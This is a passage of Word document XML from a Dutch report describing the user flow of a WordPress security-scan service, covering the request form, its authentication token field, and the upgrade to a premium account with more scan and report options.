                    <w:p w14:paraId="600A8DF3" w14:textId="0FF4983E" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00C00F2D">
                      <w:r>
                        <w:t>Het formulier bestaat uit de velden:</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="35814AC1" w14:textId="0BB99F4C" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="0015310C">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="21"/>
                        </w:numPr>
                      </w:pPr>
                      <w:r>
                        <w:t>Naam</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="5AB5CE56" w14:textId="689FF58A" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="0015310C">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="21"/>
                        </w:numPr>
                      </w:pPr>
                      <w:r>
                        <w:t>Bedrijf</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="6B20E938" w14:textId="7A8BF6FC" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="0015310C">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="21"/>
                        </w:numPr>
                      </w:pPr>
                      <w:r>
                        <w:t>E-mail</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="5B9B940F" w14:textId="1C92CE8D" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="0015310C">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="21"/>
                        </w:numPr>
                      </w:pPr>
                      <w:r>
                        <w:t>Token</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="668F2532" w14:textId="1FEF5342" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00E469F7">
                      <w:r>
                        <w:t>De eerste 3 velden zijn begrijpelijk maar het veld Token heeft wat uitleg nodig.</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="01F13F9B" w14:textId="7089D236" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00E469F7">
                      <w:r>
                        <w:t>Token is een gecodeerde privé sleutel die aan de kant van Wordpress en Securityreport wordt aangemaakt. De privé sleutel dient als authenticatie sleutel zodat het systeem de gebruiker herkent.</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF3B036" w14:textId="514B5A0E" w:rsidR="00C00F2D" w:rsidRDefault="00C00F2D" w:rsidP="00C86C1E"/>
    <w:p w14:paraId="0EBBCDAE" w14:textId="17A312B7" w:rsidR="00C00F2D" w:rsidRDefault="00C00F2D" w:rsidP="00C86C1E"/>
    <w:p w14:paraId="3DE74002" w14:textId="753EACA4" w:rsidR="00C00F2D" w:rsidRDefault="00C00F2D" w:rsidP="00C86C1E"/>
    <w:p w14:paraId="6B8F68D0" w14:textId="17B7ACEB" w:rsidR="00C00F2D" w:rsidRDefault="00C00F2D" w:rsidP="00C86C1E"/>
    <w:p w14:paraId="77B4D677" w14:textId="1F8FB1C8" w:rsidR="00C00F2D" w:rsidRDefault="00C00F2D" w:rsidP="00C86C1E"/>
    <w:p w14:paraId="6F948A70" w14:textId="35A73A64" w:rsidR="00C00F2D" w:rsidRDefault="00C00F2D" w:rsidP="00C86C1E"/>
    <w:p w14:paraId="308FEA97" w14:textId="066ABB11" w:rsidR="00C00F2D" w:rsidRDefault="00C00F2D" w:rsidP="00C86C1E"/>
    <w:p w14:paraId="1C277F18" w14:textId="23C64176" w:rsidR="00C00F2D" w:rsidRDefault="00C00F2D" w:rsidP="00C86C1E"/>
    <w:p w14:paraId="275CB87D" w14:textId="0704D1A1" w:rsidR="00695ACA" w:rsidRDefault="00695ACA" w:rsidP="00C86C1E"/>
    <w:p w14:paraId="7FD60715" w14:textId="6BC3D3F7" w:rsidR="00695ACA" w:rsidRDefault="00FF4610" w:rsidP="00C86C1E">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">   Figuur 5.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03AB80D1" w14:textId="45034D5B" w:rsidR="00695ACA" w:rsidRDefault="00695ACA" w:rsidP="00C86C1E"/>
    <w:p w14:paraId="65797AAF" w14:textId="30056D06" w:rsidR="00695ACA" w:rsidRDefault="00695ACA" w:rsidP="00C86C1E"/>
    <w:p w14:paraId="32438633" w14:textId="5B343F51" w:rsidR="00C00F2D" w:rsidRDefault="00FF4610" w:rsidP="00C86C1E">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252934144" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6E6663E0" wp14:editId="56EDA8E9">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>3155950</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>106045</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2945130" cy="3342640"/>
            <wp:effectExtent l="0" t="0" r="1270" b="1016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lternatieve email.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45130" cy="3342640"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00137542">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252935168" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2BDC62FF" wp14:editId="4C85BF7A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-25400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>113665</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2662555" cy="561340"/>
                <wp:effectExtent l="0" t="0" r="29845" b="22860"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="245" name="Text Box 245"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2662555" cy="5613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E0583" w14:textId="3A1755E7" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:r>
                              <w:t>Er kan een alternatieve E-mail mee worden verzonden i.p.v. de standaard Wordpress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62FF" id="Text Box 245" o:spid="_x0000_s1201" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-2pt;margin-top:8.95pt;width:209.65pt;height:44.2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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="577E0583" w14:textId="3A1755E7" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:r>
                        <w:t>Er kan een alternatieve E-mail mee worden verzonden i.p.v. de standaard Wordpress E-mail.</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="63801B22" w14:textId="402EE955" w:rsidR="00C00F2D" w:rsidRDefault="00C00F2D" w:rsidP="00C86C1E"/>
    <w:p w14:paraId="01CC7657" w14:textId="2F96E9B2" w:rsidR="00456F5A" w:rsidRDefault="00456F5A" w:rsidP="00C86C1E"/>
    <w:p w14:paraId="43E1CBDE" w14:textId="64AA5ED1" w:rsidR="00456F5A" w:rsidRDefault="00456F5A" w:rsidP="00C86C1E"/>
    <w:p w14:paraId="5FADD11B" w14:textId="2DECE0B2" w:rsidR="00AF19C5" w:rsidRDefault="00AF19C5" w:rsidP="00C86C1E"/>
    <w:p w14:paraId="484DACA4" w14:textId="26DB24C7" w:rsidR="00456F5A" w:rsidRDefault="00456F5A" w:rsidP="00C86C1E"/>
    <w:p w14:paraId="69704DC2" w14:textId="5363ADC2" w:rsidR="00AF58F9" w:rsidRDefault="00AF58F9" w:rsidP="00C86C1E"/>
    <w:p w14:paraId="3533905B" w14:textId="2C779C9E" w:rsidR="00456F5A" w:rsidRDefault="00456F5A" w:rsidP="00C86C1E"/>
    <w:p w14:paraId="53314FBC" w14:textId="73D82C7D" w:rsidR="00186789" w:rsidRDefault="00186789" w:rsidP="00C86C1E"/>
    <w:p w14:paraId="00E11412" w14:textId="6FF2FEF1" w:rsidR="00B96F8B" w:rsidRDefault="00B96F8B"/>
    <w:p w14:paraId="30CDB486" w14:textId="6F901064" w:rsidR="00730594" w:rsidRDefault="00FF4610">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="52986398" w14:textId="1A124468" w:rsidR="00730594" w:rsidRDefault="00FF4610">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253213696" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="49D718FB" wp14:editId="4B96CD52">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3155950</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>170180</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1016000" cy="228600"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="802" name="Text Box 802"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="101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E2B3E" w14:textId="1EDF1CD8" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:r>
                              <w:t>Figuur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718FB" id="Text Box 802" o:spid="_x0000_s1202" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:248.5pt;margin-top:13.4pt;width:80pt;height:18pt;z-index:2532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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="289E2B3E" w14:textId="1EDF1CD8" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:r>
                        <w:t>Figuur 5.3</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00730594">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EAE93ED" w14:textId="2BE17743" w:rsidR="00B47069" w:rsidRDefault="00B47069" w:rsidP="00224B2F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00726BA6">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252966912" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0223A870" wp14:editId="081CC15E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-912495</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-712174</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="221" name="Rectangle 22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C6704" id="Rectangle 221" o:spid="_x0000_s1026" style="position:absolute;margin-left:-71.85pt;margin-top:-56.05pt;width:25pt;height:1031.7pt;z-index:-2503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" fillcolor="#bb2422" strokecolor="#bb2422" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6DC502" w14:textId="77777777" w:rsidR="00B47069" w:rsidRDefault="00B47069" w:rsidP="00224B2F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BF123C1" w14:textId="261FC551" w:rsidR="00E30D45" w:rsidRPr="00726BA6" w:rsidRDefault="007E550D" w:rsidP="00224B2F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252969984" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="65BFFA14" wp14:editId="03A92015">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>3059556</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>10759</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3333512" cy="3763682"/>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nelle scan.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId87">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3333512" cy="3763682"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="0023233C">
        <w:t>Scan aanvraag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E03E83B" w14:textId="6720BE96" w:rsidR="00726BA6" w:rsidRPr="001250BF" w:rsidRDefault="00243FA5">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252971008" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2E378331" wp14:editId="20281519">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-154940</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>248920</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2730500" cy="1939925"/>
                <wp:effectExtent l="0" t="0" r="38100" b="15875"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="474" name="Text Box 474"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2730500" cy="19399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3567964" w14:textId="2676D35E" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">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78331" id="Text Box 474" o:spid="_x0000_s1203" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-12.2pt;margin-top:19.6pt;width:215pt;height:152.75pt;z-index:25297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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="63567964" w14:textId="2676D35E" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">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v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="34215745" w14:textId="7AE33430" w:rsidR="001250BF" w:rsidRDefault="001637FE">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252991488" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="576143D9" wp14:editId="72BD7209">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-150495</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2112010</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2730500" cy="462280"/>
                <wp:effectExtent l="0" t="0" r="38100" b="20320"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="655" name="Text Box 655"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2730500" cy="46228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1DD0B3" w14:textId="2AF5C527" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="001250BF">
                            <w:r>
                              <w:t xml:space="preserve">De gebruiker kan door contact op te nemen met S5 zijn account upgraden naar Premium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143D9" id="Text Box 655" o:spid="_x0000_s1204" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-11.85pt;margin-top:166.3pt;width:215pt;height:36.4pt;z-index:2529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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="7E1DD0B3" w14:textId="2AF5C527" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="001250BF">
                      <w:r>
                        <w:t xml:space="preserve">De gebruiker kan door contact op te nemen met S5 zijn account upgraden naar Premiumaccount. </w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC72974" w14:textId="54BACA16" w:rsidR="001250BF" w:rsidRDefault="001250BF">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="728DFE96" w14:textId="2491B4DE" w:rsidR="001250BF" w:rsidRDefault="0043602E">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253067264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3684D649" wp14:editId="7F1302A3">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-154305</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>350520</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2735580" cy="1602740"/>
                <wp:effectExtent l="0" t="0" r="33020" b="22860"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="744" name="Text Box 744"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2735580" cy="16027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55A040C" w14:textId="08E53EE8" w:rsidR="002A05E5" w:rsidRPr="00325408" w:rsidRDefault="002A05E5">
                            <w:r w:rsidRPr="00325408">
                              <w:t>Na het activeren van het premium accountgebruiker een E-mail ter bevestiging ervan. Wanneer de gebruiker terugkeert naar Pandora dan ziet het aanvraagformulier er anders uit. De gebruiker kan nu uit meerdere scan opties kiezen en kan ook kiezen tussen een volledig rapport en korte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D649" id="Text Box 744" o:spid="_x0000_s1205" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-12.15pt;margin-top:27.6pt;width:215.4pt;height:126.2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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="055A040C" w14:textId="08E53EE8" w:rsidR="002A05E5" w:rsidRPr="00325408" w:rsidRDefault="002A05E5">
                      <w:r w:rsidRPr="00325408">
                        <w:t>Na het activeren van het premium accountgebruiker een E-mail ter bevestiging ervan. Wanneer de gebruiker terugkeert naar Pandora dan ziet het aanvraagformulier er anders uit. De gebruiker kan nu uit meerdere scan opties kiezen en kan ook kiezen tussen een volledig rapport en korte rapport.</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6CAA37" w14:textId="217BC718" w:rsidR="001250BF" w:rsidRDefault="00FF4610">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253214720" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="71CC84FF" wp14:editId="01DCCA9B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3023235</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>50165</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1079500" cy="228600"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="803" name="Text Box 803"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1079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4C57D7" w14:textId="0E5556FB" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:r>
                              <w:t>Figuur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C84FF" id="Text Box 803" o:spid="_x0000_s1206" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:238.05pt;margin-top:3.95pt;width:85pt;height:18pt;z-index:2532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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="2D4C57D7" w14:textId="0E5556FB" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:r>
                        <w:t>Figuur 5.4</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00916499">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253064192" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="50D9806F" wp14:editId="2E73C29F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>3086735</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>395605</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3383915" cy="2399665"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>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remiumaccount.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId88">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3383915" cy="2399665"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCAE534" w14:textId="5C4F24F8" w:rsidR="001250BF" w:rsidRDefault="00916499">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253066240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3A80D032" wp14:editId="05D1716A">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>3087370</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>2596515</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3364230" cy="2418080"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>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lijst met report type.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId89">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3364230" cy="2418080"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
